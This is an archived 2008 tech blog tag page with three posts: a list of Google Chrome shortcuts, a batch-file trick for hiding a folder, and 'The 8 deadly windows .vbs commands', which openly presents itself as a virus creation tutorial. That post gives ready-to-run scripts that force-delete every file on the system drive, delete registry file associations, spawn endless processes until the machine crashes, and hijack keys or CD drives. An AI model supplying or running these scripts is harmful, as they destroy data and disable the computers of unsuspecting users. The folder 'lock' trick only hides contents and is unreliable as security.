iTechnoBuzz!!

Get the latest techno news, get your techno life updated.

Advertisement

Posts Tagged ‘ hacks ’

The 8 deadly windows .vbs commands

Posted on December 2, 2008 by chinks | 13 Comments

vbs code The 8 deadly windows .vbs commands

Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial, iTechnoBuzz is not responsible for your loss.

Here on www.itechnobuzz.com , I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.

To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

-The blue screen of Death [this might be dangerous]

Code:-

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

-Stupidity Shutdown

*This pops up a funny message then will shutdown the computer*

code:-

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

-Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

-Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

-Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

-Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/digg_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/reddit_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/stumbleupon_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/delicious_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/blogmarks_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/furl_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/technorati_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/google_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/facebook_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/yahoobuzz_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/twitter_48.png

googlechrome Google Chrome Tips, Tricks, Hacks and Shortcuts

Its been a long time that google launched the powerful Google Chrome web browser,

here on www.ItechnoBuzz.com, i will Provide some Useful Google Chrome Tips, tricks, Hacks and shortcuts, that one should know if you are a google fan.

Here we Go:–

1. Create application shortcut : Create desktop and Start menu shortcuts to web apps such as Gmail – go to Gmail.com and then select  from the Page Control menu (in the top-right corner of your browser – it looks like a page with the corner folded over). Now choose where you want to place your shortcut. This works for other Google apps such as Calendar and Documents, and other services such as Windows Live Hotmail.

2. Control + Shift + N opens an ‘incognito’ window – sites you view in this window won’t appear in your history and cookies served by sites in this window will be deleted when the window is closed.

3. You can open a link in an incognito window by right-clicking the link and selecting Open link in incognito window.

4. Alt + Home loads your Google Chrome home page, with thumbnails of your most visited sites shown in the active tabbed window.

5. Control + T opens a new tab. You can drag tabs around to change their order or drag a tab out of the window into its own window.

6. Control + Shift + T opens your most recently closed tab. Press the key combination again to open the tab closed before that one. Google Chrome remembers the last 10 tabs you’ve closed.

7. Jump to different open tabs using Control + 1, Control + 2, Control + 3, etc. Control + 9 takes you to the last tab.

8. Control + Tab lets you cycle through your open tabs in order.

9. Control + Shift + Tab cycles through your tabs in the opposite order.

10. As with Firefox 3, you can drag a link onto a tab to open it in that tab, or drop it between two tabs to open a new tab in that position.

11. To bookmark a site click the star on the left of the address bar and then select a folder to add it to.

12. Control +B hides the Google Chrome bookmarks bar. Press Control + B to bring it back again.

13. Right-click or hold down the back button and you’ll get a drop-down list of sites to go back through. Show Full History, at the bottom of the list, opens a new tab with your full browser history.

14. Control + H is a faster way to bring up the History page.

g chrome Google Chrome Tips, Tricks, Hacks and Shortcuts15. You can delete history for chosen days by scrolling to the day you want to delete and clicking Delete history for this day on the right-hand side of the window.

16. Control + J brings up your Downloads page.

17. To clear an item from your Downloads page, right-click an entry and select Remove.

18. Press Control + K or Control + E to search from the address bar. Once pressed, you’ll see a ? symbol appear in the address bar and you can simply enter your search query and hit Return.

19. Right-click the top of the browser window and select Task manager to see how much memory different tabs and plug-ins are using. Highlight one and click End process to stop it running.

20. Shift + Escape is a quicker way to bring up the Google Chrome Task manager.

21. To see what plug-ins are installed, type about:plugins into the address window.

22. You can also type the following commands into the Google Chrome address window: about:stats, about:network, about:histograms, about:memory, about:cache, about:dns.

23. Type about:crash to see what a crashed tab looks like.

24. A three-second diversion: type about:internets. (Only works in Windows XP.)

25. Edit any web page – right-click a page and select Inspect element. Now edit the HTML source code and hit Return to view the changes.

26. To make Google Chrome your default browser, click the Tools button (in the right-hand corner of the browser window – a spanner icon). Select Options, click the Basics tab and then click the Make Google Chrome my default browser button.

27. To delete cookies, go to Tools > Options > Under the Hood. Scroll down to the Security section, and click Show cookies. Now you can click Remove all or remove individual cookies.

28. To clear more data such as the Google Chrome browsing history and cache, click the Tools icon and select Clear browsing data…

29. To clear the most visited web sites that appear on your Google Chrome start page, you must clear your browsing history using the method above.

30. Clearing your Google Chrome browser history will also stop matches from previously browsed sites appearing as suggestions in your address bar.

http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/digg_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/reddit_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/stumbleupon_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/delicious_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/blogmarks_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/furl_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/technorati_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/google_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/facebook_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/yahoobuzz_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/twitter_48.png

Folder Lock Without Folder Lock

Posted on September 28, 2008 by ritvek | No Comments

FED UP OF FOLDER LOCK

imgtt Folder Lock Without Folder Lock


Lock FOLDER without any application

Ohh…its true. You can lock any folder without using any software. You have to follow certain rules:-


1.Suppose you have a folder named Akon in any drive, say D:/

2.In the same drive next to the folder create a new notepad file with the exact statement
ren Akon Akon.{21EC2020-3AEA-1069-A2DD-08002B30309D}

3.Now save this text file as lock.bat

4.Create another notepad file and type
ren Akon.{21EC2020-3AEA-1069-A2DD-08002B30309D} Akon

5.Save this as unlock.bat

fin Folder Lock Without Folder Lock

6.Now there are two batch files . Double click lock.bat and your folder will change into Control Panel and its contents cannot be viewed. Even if you double click it, the inside is directed to control panel.

7.To open the folder double click unlock.bat and you get back your original folder .

8. For more safety keep the unlock.bat in another location, and only move it to same directory for unlocking and just double click. Or you can keep lock.bat on the other location just when needed, bring it back to the folder and lock it.

Try it….Have a happy hiding….Stay tuned to technobuzz for more cool tips and tricks.

http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/digg_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/reddit_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/stumbleupon_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/delicious_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/blogmarks_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/furl_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/technorati_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/google_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/facebook_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/yahoobuzz_48.png http://www.itechnobuzz.com/wp-content/plugins/sociofluid/images/twitter_48.png